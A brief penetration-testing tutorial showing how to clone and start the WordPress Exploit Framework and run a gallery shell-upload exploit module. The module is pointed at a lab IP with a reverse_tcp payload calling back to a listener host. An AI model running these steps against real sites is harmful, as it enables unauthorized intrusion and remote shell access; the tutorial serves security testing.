A Ruby framework for developing and using modules which aid in the penetration testing of WordPress powered websites and systems
first clone WPXF repository from github, to do so type:
https://github.com/rastating/wordpress-exploit-framework.git
now Open kali linux terminal in the directory that you have downloaded WordPress Exploit Framework to, and start it by running
ruby wpxf.rb.
Once loaded, you'll be presented with the wpxf prompt, from here you can search for modules using the
search command or load a module using the use command.wpxf > use exploit/refelex_gallery_shell_upload
wpxf [exploit/ refelex_gallery_shell_upload] > set host 192.168.0.104
wpxf [exploit/ refelex_gallery_shell_upload] > set target_uri /
wpxf [exploit/ refelex_gallery_shell_upload] > set payload reverse_tcp
wpxf [exploit/ refelex_gallery_shell_upload] > set lhost 192.168.0.105
wpxf [exploit/ refelex_gallery_shell_upload] > run
